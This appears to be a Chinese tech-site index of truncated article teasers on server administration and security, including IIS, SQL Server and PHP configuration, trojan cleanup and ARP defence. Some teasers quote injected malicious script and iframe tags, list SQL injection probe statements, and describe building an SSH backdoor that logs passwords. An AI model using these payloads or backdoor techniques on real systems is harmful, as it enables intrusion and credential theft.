IIS: 在Internet服务管理器上点右键,属性,MIME类型,更改 在单个站点上点右键,属性,HTTP头,MIME类型 添加如下MIME类型 wml text/vnd.wap.wml wmlc application/vnd.wap.wmlc wbmp image/vnd.wap.wbmp wmlsc application/vnd.wap.wmlscriptc wmls text/vnd.wap.wmlscript wsc...

如果你的数据库中被写入了 script src=http://3b%6Fmb.com/c.js/script类似的木马,您可以采用这个方法快速的删除木马! 新建存储过程,然后允许就可以了 CREATE PROCEDURE dbo.ss AS declare @t varchar(555),@c varchar(555) ,@inScript varchar(8000) set @inScript='script...

以下是方法1： 现象：机器正在调试或允许IIS时,被异常中断服务(比如停电)，然后再次IIS运行页面时，CPU资源占用100%，即使重新启动也无效。 原因：发生中断时，IIS会写异常日志，但是此时写入了乱码，造成IIS一直写日志的死循环，耗尽了系统资源。找到系统路径\System32\Log...

远程连接sql server 2000服务器的解决方案 一 看ping 服务器IP能否ping通。 这个实际上是看和远程sql server 2000服务器的物理连接是否存在。如果不行，请检查网络，查看配置，当然得确保远程sql server 2000服务器的IP拼写正确。 二 在Dos或命令行下输入telnet 服务器IP 端...

-----------------------一、软件准备：------------------------- 以下均为截止2005-4-20的最新正式版本 PHP(5.0.4)：http://cn.php.net/get/php-5.0.4-Win32.zip/from/a/mirror MySQL(4.1.11)：http://www.skycn.com/soft/1262.html http://dev.mysql.com/downloads/mysql...

防止黑客的入侵 在谈黑客入侵方面的安全管理之前，我先简单介绍一些黑客攻击Linux主机的主要途径和惯用手法，让大家对黑客攻击的途径和手法有所了解。这样才能更好地防患于未然，做好安全防范。 要阻止黑客蓄意的入侵，可以减少内网与外界网络的联系，甚至独立于其它网络系...

SQL注射语句 1.判断有无注入点 ' ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0(select count(*) from *) and 0(select count(*) from admin) ---判断是否存在admin这张表 3.猜帐号数目 如果遇到0 返回正确页面 1返回错误页...

网上很多方法防治arp欺骗病毒,安装arp防火墙,绑定网关地址等,下面我就给大家提供一种更好更有效的办法npptools.dll预防ARP病毒处理 首先解释俩个问题: 提问:为什么修改npptools.dll文件权限就可以了呢? 回答:原因就是ARP欺骗病毒缺少了npptools.dll这个文件就无法运行，一但...

Php的环境一般是apache+php+mysql,平常配置服务器一般是打开php.ini里的安全模式，将safe_mode设为on，还有就是将display_erors设为off，即关闭错误显示。还有一个非常重要的配置选项-----magic_quotes_gpc,高版本默认为on,以前的版本中默认为off。当magic_quotes_gpc为on的...

在微软本月月经日(8.11)的同一天，国外黑客taviso和julien公开了可以攻击所有新旧Linux系统的一个漏洞，包括但不限于 RedHat,CentOS,Suse,Debian,Ubuntu,Slackware,Mandriva,Gentoo及其衍生系统。黑客只需要执行一个命令，就可以通过此漏洞获得root权限，即使开启了SELinux...

SQL Server的安全配置 除跟着微软打满所有补丁外，还需要加强数据库的安全。 首先，你需要加强象sa这样的帐号的密码，跟系统帐号的使用配置相似，一般*作数据库不要使用象sa这样的最高权限的帐号，而使用能满足你的要求的一般帐号。 接着对扩展存储过程开始大屠杀，首先就是...

首先我先编译一个ssh后门，这个ssh后门会在/tmp/xxxxxx记录所有的登录密码 启动他 QUOTE: root@laptop:/usr/local/openssh2/sbin# ps aux | grep sshd root 13619 0.0 0.3 7432 1752 ? Ss 23:44 0:00 ./sshd -p 1234 root 13707 0.0 0.2 4292 1328 pts/3 R+ 23:58 0:00 grep...

一.更改sa口令方法： 用sql综合利用工具连接后，执行命令： exec sp_password NULL,'新密码','sa' (提示：慎用!) 二.简单修补sa弱口令. 方法1:查询分离器连接后执行： if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPRO...

关于安全测试工具，我发现大体上你都能购买到。然而，还有一些是免费的工具，没有这些工具我会举步维艰，所以我将两种类型的工具一同与你分享。 基于Widnows平台的电脑，有7类常见的安全测试工具，它们是： 1. 端口扫描 (Port scanners) 2. 网络/操作系统弱点扫描 (Network/...

既然是我们的防范是从入侵者角度来进行考虑，那么我们就首先需要知道入侵者的入侵方式。目前较为流行web入侵方式都是通过寻找程序的漏洞先得到网站的webshell然后再根据服务器的配置来找到相应的可以利用的方法进行提权，进而拿下服务器权限的。所以配合服务器来设置防止web...

2003服务器 查IIS 挂马全过程 一台服务器 几乎所有网站打开网页 甚至HTML网页 都出现了 iframe src=http://www.seo100.net/web.htm height=0 width=0/iframe 这种样式的代码 有的在头部 有的在尾部 部分杀毒软件打开会报毒 打开HTML或ASP PHP页面 在源码中怎么也找不到这段...